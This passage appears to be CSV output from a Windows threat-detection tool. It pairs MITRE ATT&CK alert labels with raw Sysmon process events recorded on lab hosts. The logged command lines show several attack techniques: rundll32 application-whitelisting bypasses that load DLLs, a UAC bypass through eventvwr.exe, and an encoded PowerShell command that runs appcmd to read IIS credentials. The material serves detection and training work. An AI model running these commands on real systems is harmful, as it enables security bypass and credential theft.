<Data Name=""ParentCommandLine"">cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; advpack.dll,RegisterOCX c:\Windows\System32\calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T14:18:09.589507Z"">
</TimeCreated>
<EventRecordID>16452</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 14:18:09.573</Data>
<Data Name=""ProcessGuid"">365ABB72-2B21-5CD8-0000-001039DD2500</Data>
<Data Name=""ProcessId"">816</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; advpack.dll,RegisterOCX c:\Windows\System32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2B1B-5CD8-0000-0010CCC92500</Data>
<Data Name=""ParentProcessId"">3320</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T14:18:09.589507Z"">
</TimeCreated>
<EventRecordID>16452</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 14:18:09.573</Data>
<Data Name=""ProcessGuid"">365ABB72-2B21-5CD8-0000-001039DD2500</Data>
<Data Name=""ProcessId"">816</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; advpack.dll,RegisterOCX c:\Windows\System32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2B1B-5CD8-0000-0010CCC92500</Data>
<Data Name=""ParentProcessId"">3320</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T14:18:09.589507Z"">
</TimeCreated>
<EventRecordID>16452</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 14:18:09.573</Data>
<Data Name=""ProcessGuid"">365ABB72-2B21-5CD8-0000-001039DD2500</Data>
<Data Name=""ProcessId"">816</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; advpack.dll,RegisterOCX c:\Windows\System32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2B1B-5CD8-0000-0010CCC92500</Data>
<Data Name=""ParentProcessId"">3320</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:17.543407Z"">
</TimeCreated>
<EventRecordID>424115</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:17.542</Data>
<Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
<Data Name=""ProcessId"">9116</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
<Data Name=""ParentProcessId"">7552</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:17.543407Z"">
</TimeCreated>
<EventRecordID>424115</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:17.542</Data>
<Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
<Data Name=""ProcessId"">9116</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
<Data Name=""ParentProcessId"">7552</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line (&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;) and Parent Image :C:\Windows\System32\eventvwr.exe , Parent CommandLine (&quot;C:\Windows\system32\eventvwr.exe&quot;) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-09T01:59:29.090897Z"">
</TimeCreated>
<EventRecordID>11116</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1980"" ThreadID=""1904"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-09 01:59:28.903</Data>
<Data Name=""ProcessGuid"">365ABB72-8980-5CD3-0000-0010134D1F00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-863B-5CD3-0000-00204A390100</Data>
<Data Name=""LogonId"">0x1394a</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-8980-5CD3-0000-00105F451F00</Data>
<Data Name=""ParentProcessId"">3884</Data>
<Data Name=""ParentImage"">C:\Windows\System32\eventvwr.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\eventvwr.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:17.543407Z"">
</TimeCreated>
<EventRecordID>424115</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:17.542</Data>
<Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
<Data Name=""ProcessId"">9116</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
<Data Name=""ParentProcessId"">7552</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.034674,2019-05-27T05:29:20.034674+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:20.034674Z"">
</TimeCreated>
<EventRecordID>5976</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.994</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-001032DBFF00</Data>
<Data Name=""ProcessId"">1900</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1088] Bypass User Account Control - Process,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-09T01:59:29.090897Z"">
</TimeCreated>
<EventRecordID>11116</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1980"" ThreadID=""1904"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-09 01:59:28.903</Data>
<Data Name=""ProcessGuid"">365ABB72-8980-5CD3-0000-0010134D1F00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-863B-5CD3-0000-00204A390100</Data>
<Data Name=""LogonId"">0x1394a</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-8980-5CD3-0000-00105F451F00</Data>
<Data Name=""ParentProcessId"">3884</Data>
<Data Name=""ParentImage"">C:\Windows\System32\eventvwr.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\eventvwr.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-09T01:59:29.090897Z"">
</TimeCreated>
<EventRecordID>11116</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1980"" ThreadID=""1904"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-09 01:59:28.903</Data>
<Data Name=""ProcessGuid"">365ABB72-8980-5CD3-0000-0010134D1F00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-863B-5CD3-0000-00204A390100</Data>
<Data Name=""LogonId"">0x1394a</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-8980-5CD3-0000-00105F451F00</Data>
<Data Name=""ParentProcessId"">3884</Data>
<Data Name=""ParentImage"">C:\Windows\System32\eventvwr.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\eventvwr.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
